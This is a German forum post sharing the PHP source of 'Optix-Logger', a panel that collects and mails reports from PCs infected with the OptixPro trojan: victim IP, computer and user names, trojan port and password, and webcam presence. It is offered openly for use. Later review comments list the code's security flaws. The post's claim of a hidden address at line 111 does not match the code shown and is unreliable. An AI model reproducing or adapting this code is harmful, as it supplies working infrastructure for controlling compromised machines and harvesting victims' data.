
es speichert von einem pc gesendete strings die informationen über den pc enthalten.
es wurde zwar ursprünglich als notify-logger für einen trojaner gecodet, kann von den php-codern auf dem board aber sicher modifiziert werden.
in zeile 111 findet man die email adresse des coders -> TNO@web.de. das hat der schlingel da eingebaut um ebenfalls an die infos zu kommen...

nach meinen erfahrungen sollte die adresse durch eine gültige adresse ersetzt werden, sonst schrottet das script nach ner weile...
das ist der string: %I %C %S %N %TP %TPW %W %WC
%I = Includes The Computers IP
%C = Computer Name
%S = System Name
%N = Victim Name
%TP = Include The Trojan Port
%TPW = Include Trojan Password
%W = Windows Version
%WC = Detect Webcam
sollte das script hier nicht gern gesehen sein, dann ganz einfach löschen,
have fun...

<?php $counter=0;
// NOTE(review): the line above is data as well as code. DoLog() and the
// "delpass" branch rewrite the first line of $filename with the current
// record count, and DoLog() inserts each record as a "//" comment line
// directly below it. With $filename set to this script's own name, the
// script therefore edits itself on every logged request.
/*************************************************************************
* Optix-Logger - PHP-Logging for OptixPro *
* ©2003-2004 by TrustNoOne *
* --> http://tn0.cjb.net <-- *
* " RTFM " *
*************************************************************************/
// Operator configuration. The password is kept in plain text in the source.
$ThePass="Passwort"; //<-------- Your password
$wronguser="0"; //<-------- Notification when a wrong password is entered "0"=off "1"=on
$option ="0"; //<-------- "0"=Log ; "1"=Mail ; "2"=Log+Mail
$to_mail="deineMail@addresse.de"; //<-------- Your e-mail address
$filepath="http://www.deinHost.de/"; //<------- Path to the file
$filename ="log.php"; //<-------- Name of the file
$signature="mfg OP-Logger"; //<-------- Signature of the mail
$from_name="OP-Logger"; //<-------- Sender name of the mail
$message="Ein Freund wartet auf deinen Besuch :";//<------- Heading inside the mail
$subject="OptixPro-Server ist Online"; //<-------- Subject of the mail
$sep_a = "{"; //<-------- First separator
$sep_b = "}"; //<-------- Second separator
/*************************************************************************
* *
* Please do not change anything below this point. *
* *
*************************************************************************/
// NOTE(review): $REMOTE_ADDR and $HTTP_USER_AGENT are read as bare globals, and
// $action, $pwd, $pwd2, $pwd3, $body, $addr, $port and $dateiname are used below
// without ever being assigned in this listing. Presumably all of them are
// injected by register_globals (removed in PHP 5.4), which dates the script and
// means every one of those names is request-controlled.
$ip=$REMOTE_ADDR;
$agent=$HTTP_USER_AGENT;
// $td is not referenced anywhere else in this listing.
$td=date("F jS");
$date=date("d.m.y");
$time=date("H:i");
// Timestamp string stored with each record ("Uhr" is German for "o'clock").
$LogTime=$date." - ".$time." Uhr";
/*
 * Prepends one record to $filename as a "//"-commented HTML table row and
 * updates the record counter stored in that file's first line.
 *
 * $LogTime  timestamp string shown in the last data column
 * $ip       address shown in the IP column and put into the "check" link
 * $port, $user, $comp, $win, $vic, $cam, $Pwd
 *           field values written into the remaining columns
 *
 * NOTE(review): none of the values is escaped or validated before it is
 * written into a file that the web server executes as PHP and that the view
 * branch later echoes as HTML. The "//" prefix is the only thing separating
 * stored request data from code.
 * NOTE(review): the file is read, truncated and rewritten without flock() and
 * without checking the fopen() result, so overlapping requests can lose or
 * corrupt records.
 */
function DoLog($LogTime,$ip,$port,$user,$comp,$win,$vic,$cam,$Pwd)
{
global $filename;
global $counter;
// Alternate the row background colour by counter parity.
if($counter % 2)
{
$span="<tr align=\"center\" bgcolor=\"#99B2FF\">";
}
else
{
$span="<tr align=\"center\" bgcolor=\"#ffffff\">";
}
$counter=$counter+1;
// Read the whole file and drop its first line (the old counter statement);
// $dateianf is not used afterwards.
$data = file($filename);
$dateianf=array_shift($data);
// "w" truncates the file; it is rebuilt line by line below.
$fp = fopen($filename, "w");
fputs($fp,'<?php $counter='.$counter.';');
fputs($fp,"\r\n");
// $filepath is not declared global in this function, so it is unset here and
// the "check" link ends up relative (just $filename plus the query string).
$content='//'.$span.'<td>'.$counter.'</td><td>'.$ip.'</td><td> '.$port.'</td><td>'.$Pwd.'</td><td> '.$user.'</td><td> '.$comp.'</td><td> '.$win.'</td><td> '.$vic.'</td><td> '.$cam.'</td><td>'.$LogTime.'</td><td><a href="'.$filepath.$filename.'?action=ping&addr='.$ip.'&port='.$port.'" target="_blank">check</td></tr>';
fputs($fp,$content);
fputs($fp,"\r\n");
// Write back every remaining original line (older records, then the script).
foreach ($data as $data1)
fputs($fp,$data1);
fclose ($fp);
}
/*
 * Sends one plain-text mail through PHP's mail().
 *
 * $to_mail    recipient address
 * $log        text placed in the middle of the body
 * $from_name  display name used in the From header
 * $subject    mail subject
 * $message    heading placed above $log
 * $signature  text placed below the "-----" separator
 *
 * The return value of mail() is ignored, so delivery failures are silent.
 */
function SendMail($to_mail,$log,$from_name,$subject,$message,$signature)
{
// The sender address is hard-coded here, independent of the configuration block.
$from_mail="DoNotAnswer@icq.com";
$body="\n $message \n $log\n \n ----- \n $signature";
$from="\"$from_name\" <$from_mail>";
// Header lines are joined with "\n" rather than "\r\n".
$headers="Content-Type: text/plain; charset=iso-8859-1\nFrom: $from";
mail($to_mail,$subject,$body,$headers);
}
// Branch "pass": password-gated view of the stored records.
// $action and $pwd are never assigned in this listing (presumably request
// parameters injected by register_globals).
if ($action == "pass")
{
// NOTE(review): plain-text, loose (==) comparison against the hard-coded
// $ThePass; no lockout or rate limiting is visible in this listing.
if ($pwd ==$ThePass)
{
// Load the file named by $filename; the records are its commented lines.
$tables=file($filename);
$toptable='<tr bgcolor="#99B2FF"><th>Nr.</th><th>IP:</th><th>Port:</th><th>Pass:</th><th>User:</th><th>Computer:</th>';
$toptable.='<th>WindowsVersion:</th><th>Victim:</th><th>Webcam:</th><th>Datum:</th><th>Online:</th></tr>';
echo ("<html>
<head>
</head>
<body bgcolor=\"#000000\" link=\"#ff0000\" vlink=\"#ff0000\">
<div align=\"center\">
<span style=\"font-family:Verdana; font-size:6mm; color:#3300CC;\">Optix-Logger</span></div>
<table border=\"0\" valign=\"top\" width=\"100%\">
<tr>
<td align=\"left\" valign=\"bottom\"><a href=\"log.php?action=save\">Speichern unter</a></td>
<td align=\"right\" valign=\"bottom\"><a href=\"log.php?action=delall\">alle löschen</a></td></tr></table>
<table border=\"1\" valign=\"top\" width=\"100%\" bgcolor=\"#99B2FF\">
<colgroup>
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
</colgroup>
$toptable");
// Walk file lines 2 .. $counter+1 (array indexes 1 .. $counter), i.e. the
// record rows stored below the counter line.
$counter=$counter+1;
for ($x=1;$x<$counter;$x++)
{
// ereg_replace (removed in PHP 7.0) strips every "//" in the row, not only
// the leading comment marker. The row is then echoed as raw HTML, so stored
// field values reach the operator's browser unescaped.
$tables[$x]=ereg_replace("//", "", $tables[$x]);
echo "$tables[$x]";
}
echo ("</table>
<span style=\"font-family:Verdana; font-size:3mm; color:#e0e0e0;\">
<p align=\"center\" style=\"margin-top:2cm\">©2003-2004 by <a href=\"mailto:tno@lycos.de?subject=Optix-Logger\">
<b><span style=\"font-family:Comic; font-size:3mm; color:#0000ff;\">T</span>
<span style=\"font-family:Comic; font-size:3mm; color:#CC0033;\">N</span>
<span style=\"font-family:Comic; font-size:3mm; color:#0000ff;\">O</span>
</b></a></p>
</body>
</html>");
// NOTE(review): the mailto: link in this footer is a credits link only; no
// mail() call in this listing sends anything to that address.
}
else
{
// Wrong password, notification disabled: show the login form again.
if ($wronguser == "0")
{
echo "<p align=center>Falsches Passwort</p>";
echo "<form method=POST action=log.php?action=pass>";
echo "<p align=center>Bitte Passwort eingeben</p>";
echo "<p align=center><input type=password name=pwd size=20></p>";
echo "<p align=center><input type=submit value=Ok name=B1></p>";
echo "</form>";
}
// Wrong password, notification enabled: mail the requester's IP, User-Agent,
// date and time to $to_mail, then show the same form. Any other $wronguser
// value produces no output at all.
if ($wronguser == "1")
{
$warn="Warnung:";
$warn1="Ein User mit der IP: $ip und dem Browser: $agent hat am $date um $time Uhr versucht sich mit falschem Passwort einzuloggen !";
SendMail($to_mail,$warn1,$from_name,"Versuchter Zugriff auf Optix-Logger",$warn,"mfg\n Optix-Logger");
echo "<p align=center>Falsches Passwort</p>";
echo "<form method=POST action=log.php?action=pass>";
echo "<p align=center>Bitte Passwort eingeben</p>";
echo "<p align=center><input type=password name=pwd size=20></p>";
echo "<p align=center><input type=submit value=Ok name=B1></p>";
echo "</form>";
}
}
}
// Record intake: runs whenever the request carries a non-empty $body
// (presumably a request parameter injected by register_globals).
// NOTE(review): this path is not password-protected. Any client that can reach
// the script can add records and, with $option "1" or "2", trigger mail to
// $to_mail. For defenders: the request shape visible here is a "body"
// parameter holding brace-delimited "{label:value}" fields with "_" standing
// in for spaces.
if ($body > "")
{
// $option "0": write the record to the log file only.
if ($option == "0")
{
// Underscores in the submitted string stand in for spaces.
$log=str_replace("_"," ",$body);
// Non-greedy match of every separator-delimited field; with the default flags
// $txt[0] holds the full matches in order of appearance.
$pattern = "/($sep_a)(.*?)($sep_b)/";
preg_match_all($pattern, $log, $txt);
// Clean fields 1..7: strip the literal braces, then everything up to and
// including the last ":" (the label). Field 0 is never read; the logged
// address comes from $ip instead. No check is made that eight fields exist.
for ($x=1;$x<8;$x++)
{
$txt[0][$x]=ereg_replace("{", "", $txt[0][$x]);
$txt[0][$x]=ereg_replace("}", "", $txt[0][$x]);
$txt[0][$x]=ereg_replace("()(.*)(:)", "", $txt[0][$x]);
}
// Field order passed to DoLog: 4=port, 2=user, 1=computer, 6=windows,
// 3=victim, 7=webcam, 5=password.
DoLog($LogTime,$ip,$txt[0][4],$txt[0][2],$txt[0][1],$txt[0][6],$txt[0][3],$txt[0][7],$txt[0][5]);
// Stop here so nothing else is sent back to the submitting client.
exit;
}
// $option "1": same parsing, but the record is mailed instead of logged.
if ($option == "1")
{
$log=str_replace("_"," ",$body);
$pattern = "/($sep_a)(.*?)($sep_b)/";
preg_match_all($pattern, $log, $txt);
for ($x=1;$x<8;$x++)
{
$txt[0][$x]=ereg_replace("{", "", $txt[0][$x]);
$txt[0][$x]=ereg_replace("}", "", $txt[0][$x]);
$txt[0][$x]=ereg_replace("()(.*)(:)", "", $txt[0][$x]);
}
// Plain-text mail body; the submitted password field travels in clear text.
$log1="
IP: ".$ip."
Port: ".$txt[0][4]."
Passwort: ".$txt[0][5]."
User: ".$txt[0][2]."
Computer: ".$txt[0][1]."
Windows-Version: ".$txt[0][6]."
Victim: ".$txt[0][3]."
Webcam: ".$txt[0][7]."
Datum: ".$LogTime;
SendMail($to_mail,$log1,$from_name,$subject,$message,$signature);
exit;
}
// $option "2": same parsing, then both log and mail.
if ($option == "2")
{
$log=str_replace("_"," ",$body);
$pattern = "/($sep_a)(.*?)($sep_b)/";
preg_match_all($pattern, $log, $txt);
for ($x=1;$x<8;$x++)
{
$txt[0][$x]=ereg_replace("{", "", $txt[0][$x]);
$txt[0][$x]=ereg_replace("}", "", $txt[0][$x]);
$txt[0][$x]=ereg_replace("()(.*)(:)", "", $txt[0][$x]);
}
$log1="
IP: ".$ip."
Port: ".$txt[0][4]."
Passwort: ".$txt[0][5]."
User: ".$txt[0][2]."
Computer: ".$txt[0][1]."
Windows-Version: ".$txt[0][6]."
Victim: ".$txt[0][3]."
Webcam: ".$txt[0][7]."
Datum: ".$LogTime;
DoLog($LogTime,$ip,$txt[0][4],$txt[0][2],$txt[0][1],$txt[0][6],$txt[0][3],$txt[0][7],$txt[0][5]);
SendMail($to_mail,$log1,$from_name,$subject,$message,$signature);
exit;
}
}
// Default branch (empty $action): show the login form, which posts the
// password field "pwd" to the "pass" branch.
if ($action == "")
{
echo ("<form method=POST action=log.php?action=pass>
<p align=center>Bitte Passwort eingeben</p>
<p align=center><input type=password name=pwd size=20></p>
<p align=center><input type=submit value=Ok name=B1></p>
</form>");
}
// Branch "delall": ask for the password again (field "pwd2") before all
// records are deleted; the form posts to the "delpass" branch.
if ($action == "delall")
{
echo ("<form method=POST action=log.php?action=delpass>
<p align=center>Bitte zur Bestätigung Passwort eingeben</p>
<p align=center><input type=password name=pwd2 size=20></p>
<p align=center><input type=submit value=Ok name=B1></p>
</form>");
}
// Branch "delpass": delete every stored record after a password check.
// A wrong password produces no output and no notification.
if ($action == "delpass")
{
if ($pwd2 ==$ThePass)
{
// Remove the first $counter+1 lines of the file: the counter line plus one
// line per record. $deltables only collects the discarded lines and is not
// used afterwards.
$counter=$counter+1;
$tables1=file($filename);
for ($x=0;$x<$counter;$x++)
{
$deltables[$x]=array_shift($tables1);
}
// Rewrite the file with a fresh counter line followed by the remaining lines.
// As in DoLog(), there is no locking and no check of the fopen() result.
$fp = fopen($filename, "w");
fputs($fp,'<?php $counter=0;');
fputs($fp,"\r\n");
foreach ($tables1 as $tables2)
fputs($fp,$tables2);
fclose ($fp);
// NOTE(review): the redirect carries the password in the query string, so it
// ends up in the browser history and address bar, in web-server and proxy
// access logs, and possibly in Referer headers.
$hpstr=$filepath.$filename."?action=pass&pwd=".$pwd2;
header("Location: $hpstr");
exit;
}
}
// Branch "ping": report whether a TCP connection can be opened (3 s timeout).
// NOTE(review): no password check guards this branch, and the request-supplied
// $port is passed to fsockopen() without validation.
// NOTE(review): the connection target is $ip, which the top of the script sets
// to the requester's own address; the $addr value from the "check" link is
// only printed. The reported status therefore describes the viewer's address,
// not the logged one.
// NOTE(review): $addr and $port are echoed into the page without
// htmlspecialchars().
if ($action == "ping")
{
$fp = fsockopen ($ip, $port, $errno, $errstr, 3);
// Connection failed: render the "ist offline" page.
if (!$fp)
{
echo ("<html>
<head>
</head>
<body bgcolor\"##E0E0E0\">
<p align=\"center\">Server:</p>
<span style=\"font-family:Verdana; font-size:5mm; color:#0000B2;\">
<p align=\"center\"><u>IP:</u> $addr</p>
<p align=\"center\"><u>Port:</u> $port</p></span>
<span style=\"font-family:Verdana; font-size:5mm; color:#ff0000;\">
<p align=\"center\">ist offline</p></span>
</body>
</html>");
}
// Connection succeeded: render the "ist online" page and close the socket.
else
{
echo ("<html>
<head>
</head>
<body bgcolor\"##E0E0E0\">
<p align=\"center\">Server:</p>
<span style=\"font-family:Verdana; font-size:5mm; color:#0000B2;\">
<p align=\"center\"><u>IP:</u> $addr</p>
<p align=\"center\"><u>Port:</u> $port</p></span>
<span style=\"font-family:Verdana; font-size:5mm; color:#00FF00;\">
<p align=\"center\">ist online</p></span>
</body>
</html>");
fclose ($fp);
}
}
// Branch "save": form asking for the password (field "pwd3") and a target
// file name without extension (field "dateiname"); it posts to "savepass".
if ($action == "save")
{
echo ("<form method=POST action=log.php?action=savepass>
<p align=center>Bitte zur Bestätigung Passwort eingeben</p>
<p align=center><input type=password name=pwd3 size=20></p>
<p align=center>Bitte einen Dateinamen angeben<br>(ohne Datei-Endung)</p>
<p align=center><input type=text name=dateiname size=20></p>
<p align=center><input type=submit value=Ok name=B1></p>
</form>");
}
// Branch "savepass": export the stored records to a static HTML file after a
// password check. A wrong password produces no output.
if ($action == "savepass")
{
if ($pwd3 ==$ThePass)
{
// NOTE(review): $dateiname is request-supplied and is concatenated into the
// path with no validation, so the write location is not confined to one
// directory. The fopen() result is not checked.
$fp = fopen($dateiname.".html", "w");
$tables=file($filename);
$toptable='<tr bgcolor="#99B2FF"><th>Nr.</th><th>IP:</th><th>Port:</th><th>Pass:</th><th>User:</th><th>Computer:</th>';
$toptable.='<th>WindowsVersion:</th><th>Victim:</th><th>Webcam:</th><th>Datum:</th><th>Online:</th></tr>';
// The "." in front of $toptable sits inside the string literal, so a literal
// period is written into the exported page ahead of the header row.
fputs($fp,"<html>
<head>
</head>
<body bgcolor=\"#000000\">
<div align=\"center\">
<span style=\"font-family:Verdana; font-size:5mm; color:#3300CC;\">Optix-Logger</span></div>
<table border=\"1\" valign=\"top\" width=\"100%\" bgcolor=\"#99B2FF\">
<colgroup>
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
<col width=\"2*\">
</colgroup>
.$toptable");
// Copy file lines 2 .. $counter+1 (the record rows) into the export with every
// "//" removed; field values are written unescaped.
$counter=$counter+1;
for ($x=1;$x<$counter;$x++)
{
$tables[$x]=ereg_replace("//", "", $tables[$x]);
fputs($fp, "$tables[$x]");
}
fputs($fp,"</table>
<span style=\"font-family:Verdana; font-size:3mm; color:#e0e0e0;\">
<p align=\"center\" style=\"margin-top:2cm\">©2003 by <a href=\"mailto:tno@lycos.de?subject=Optix-Logger\">
<b><span style=\"font-family:Comic; font-size:3mm; color:#0000ff;\">T</span>
<span style=\"font-family:Comic; font-size:3mm; color:#CC0033;\">N</span>
<span style=\"font-family:Comic; font-size:3mm; color:#0000ff;\">O</span>
</b></a></p>
</body>
</html>");
// NOTE(review): $fp is never closed in this branch. The browser is redirected
// to the export under $filepath, so the file is presumably served as a plain
// static page with no password in front of it (confirm against the deployment).
$hpstr=$filepath.$dateiname.".html";
header("Location: $hpstr");
exit;
}
}